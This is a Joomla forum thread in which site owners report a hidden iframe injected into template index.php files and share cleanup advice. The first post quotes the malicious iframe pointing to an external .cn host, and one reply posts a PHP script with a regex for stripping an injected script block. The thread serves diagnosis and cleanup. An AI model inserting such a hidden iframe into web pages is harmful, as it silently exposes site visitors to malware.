Code Injection in the index.php
Moderator: General Support Moderators
Forum rules
Forum Rules
Absolute Beginner's Guide to Joomla! <-- please read before posting, this means YOU.
Security Checklist
Forum Post Assistant - If you are serious about wanting help, you will use this tool to help you post.
Forum Rules
Absolute Beginner's Guide to Joomla! <-- please read before posting, this means YOU.
Security Checklist
Forum Post Assistant - If you are serious about wanting help, you will use this tool to help you post.
-
- Joomla! Fledgling
- Posts: 2
- Joined: Fri Jul 14, 2006 12:59 pm
Code Injection in the index.php
Hi Folks
Today i have seen this code after the <body> tags "<iframe src="http://xmanages.cn/in" width=1 height=1 style="visibility: hidden"></iframe>" in the files of
Public_html/index.php
Public_html/templates/all of templates/index.php
Public_html/administrator/index.php
Public_html/administrator/templates/joomla_admin/index.php
How did they inject it. have you ever seen such a malware code. Is there anyone loks can help me with this trouble?
Have a nice day.
Today i have seen this code after the <body> tags "<iframe src="http://xmanages.cn/in" width=1 height=1 style="visibility: hidden"></iframe>" in the files of
Public_html/index.php
Public_html/templates/all of templates/index.php
Public_html/administrator/index.php
Public_html/administrator/templates/joomla_admin/index.php
How did they inject it. have you ever seen such a malware code. Is there anyone loks can help me with this trouble?
Have a nice day.
- dhuelsmann
- Joomla! Master
- Posts: 19659
- Joined: Sun Oct 02, 2005 12:50 am
- Location: Omaha, NE
- Contact:
Re: Code Injection in the index.php
I suggest you start here http://docs.joomla.org/Joomla_Administr ... _Checklist
and then here http://forum.joomla.org/viewtopic.php?f=267&t=112604
and then here http://forum.joomla.org/viewtopic.php?f=267&t=112604
Regards, Dave
Past Treasurer Open Source Matters, Inc.
Past Global Moderator
http://www.kiwaniswest.org
Past Treasurer Open Source Matters, Inc.
Past Global Moderator
http://www.kiwaniswest.org
-
- Joomla! Apprentice
- Posts: 31
- Joined: Fri Dec 23, 2005 1:30 am
Re: Code Injection in the index.php
There is a major hack going down, inserting code snippets into the joomla template index files. All my sites have been compromised, first time in 4 years.
The code snip I am finding is the hu1-hu1.cn hack. I think they are getting in through the php engine. Bad.
The code snip I am finding is the hu1-hu1.cn hack. I think they are getting in through the php engine. Bad.
-
- Joomla! Intern
- Posts: 57
- Joined: Thu Mar 02, 2006 8:09 am
Re: Code Injection in the index.php
I have run into the same thing. Anyone figured out how they're doing it yet? I'm working on just removing the crap from my php, html and htm files. Will let you know if I find a pleasant way of doing it without disturbing all the files too much.
- mandville
- Joomla! Master
- Posts: 15152
- Joined: Mon Mar 20, 2006 1:56 am
- Location: The Girly Side of Joomla in Sussex
Re: Code Injection in the index.php
here is my thinking on how I would do it,
.try and POST to the 777 permissions template folder a pre injected version of the template
.move on to the next place.
.try and POST to the 777 permissions template folder a pre injected version of the template
.move on to the next place.
HU2HY- Poor questions = Poor answer
Un requested Help PM's will be reported, added to the foe list and possibly just deleted
{VEL Team Leader}{TM Auditor }{ Showcase & Security forums Moderator}
Un requested Help PM's will be reported, added to the foe list and possibly just deleted
{VEL Team Leader}{TM Auditor }{ Showcase & Security forums Moderator}
-
- Joomla! Intern
- Posts: 57
- Joined: Thu Mar 02, 2006 8:09 am
Re: Code Injection in the index.php
Sorry, I'd fixed my stuff but hadn't given back.
Here's some code I sniped from another forum and then modified to suit me.
Save the code as a php file like 'cleanThatCrap.php' and run at the command line:
Of course, you should back up your hacked files before you blindly run my code....
I think I could have done it a line or two quicker, but by the time I thought about it, I'd cleaned my files, so I never got to refining it any further. For instance, I think the only replacement you need is actually something more like:
I was just being overly specific and as a consequence need a str_replace in there too...
Whatever works for you guys.
Here's some code I sniped from another forum and then modified to suit me.
Code: Select all
<?php
// 23/8/2008 <unknown name yet> exploit clean
// Written by [email protected] and modified to please stackedsax
// Get all files under the 'public_html' directory -- change accordingly
$command = shell_exec('find public_html -iname "*.php" -o -iname "*.html" -o -iname "*.htm" -o -iname "*.tpl"');
$lines = explode("\n", $command);
array_pop($lines); //Just to get rid of the final \n...
foreach($lines as $line)
{
// Get current contents of file
$contents = file_get_contents($line);
// Clean exploit code
// print "Cleaning file: $line\n";
$pattern = '|<html> <body><script>var source ="=jgs.*\ndocument.write.*</script>\s*\n\s*</html> </body>|ms';
$clean_contents = preg_replace($pattern, '', $contents);
$clean_contents = str_replace("</html> </body>", "</html>", $clean_contents);
// Write cleaned contents
$file = fopen($line, w);
fwrite($file, $clean_contents);
fclose($file);
}
?>
Code: Select all
> php cleanThatCrap.php
I think I could have done it a line or two quicker, but by the time I thought about it, I'd cleaned my files, so I never got to refining it any further. For instance, I think the only replacement you need is actually something more like:
Code: Select all
$pattern = '|<html> <body><script>var source ="=jgs.*</body>|ms';
Whatever works for you guys.
-
- Joomla! Apprentice
- Posts: 31
- Joined: Fri Dec 23, 2005 1:30 am
Re: Code Injection in the index.php
It appears that the code snippet was part of a much more sophisticated exploit that infected many servers from the server farm I lease from, and has nothing specifically to do with joomla. I believe the compromise was at the administrative level of the server farm, they may have got the root passwords, I don't think there was anyway to defend against it on the code level.
I was able to clean up about 40,000 files on my server with a combination of scripts and PowerGREP. I described the problem to one of my consultants and he immediately new the server farm name without my telling him, so that was the smoking gun. When I finally got the farm techs to fill me in on the scale of the compromise, it was clear that just cleaning the snippets was the least of my problems. The list of exploits was pages long and quite sophisticated. The server was so fully compromised that I would never be confident of it again. So I bit the bullet and reloaded the server, doing 2 years of work in 48 hours. Having the old drive slaved to the new one helped, I will reformat as soon as possible.
I was able to clean up about 40,000 files on my server with a combination of scripts and PowerGREP. I described the problem to one of my consultants and he immediately new the server farm name without my telling him, so that was the smoking gun. When I finally got the farm techs to fill me in on the scale of the compromise, it was clear that just cleaning the snippets was the least of my problems. The list of exploits was pages long and quite sophisticated. The server was so fully compromised that I would never be confident of it again. So I bit the bullet and reloaded the server, doing 2 years of work in 48 hours. Having the old drive slaved to the new one helped, I will reformat as soon as possible.
-
- Joomla! Intern
- Posts: 57
- Joined: Thu Mar 02, 2006 8:09 am
Re: Code Injection in the index.php
Yes, you are correct, from what I've read elsewhere, people were claiming that this was part of a root attack. The code I posted is only to clean the affected files so that your websites might work.
In the meantime, other evasive action is certainly required... backup, move to a more hardened server, change passwords.... all the usual.
In the meantime, other evasive action is certainly required... backup, move to a more hardened server, change passwords.... all the usual.
-
- Joomla! Fledgling
- Posts: 2
- Joined: Thu Mar 26, 2009 8:05 am
Re: Code Injection in the index.php
just change the permissions of file .htaccess to read only and also of the front index.php+ index.html files to read only.....
- mandville
- Joomla! Master
- Posts: 15152
- Joined: Mon Mar 20, 2006 1:56 am
- Location: The Girly Side of Joomla in Sussex
Re: Code Injection in the index.php
woithout knowing what actually happened, this information is a bit to vague.vikki237 wrote:just change the permissions of file .htaccess to read only and also of the front index.php+ index.html files to read only.....
HU2HY- Poor questions = Poor answer
Un requested Help PM's will be reported, added to the foe list and possibly just deleted
{VEL Team Leader}{TM Auditor }{ Showcase & Security forums Moderator}
Un requested Help PM's will be reported, added to the foe list and possibly just deleted
{VEL Team Leader}{TM Auditor }{ Showcase & Security forums Moderator}
-
- Joomla! Apprentice
- Posts: 28
- Joined: Fri Jan 11, 2008 7:25 am
- Location: Tamilnadu,India
- Contact:
Re: Code Injection in the index.php
i host my site in hosting server so, shell access is not possible , it is possible to run recursively on all folder PHP file & clean some base64 code injection from my php files
Help me
Thanks in advance
Help me
Thanks in advance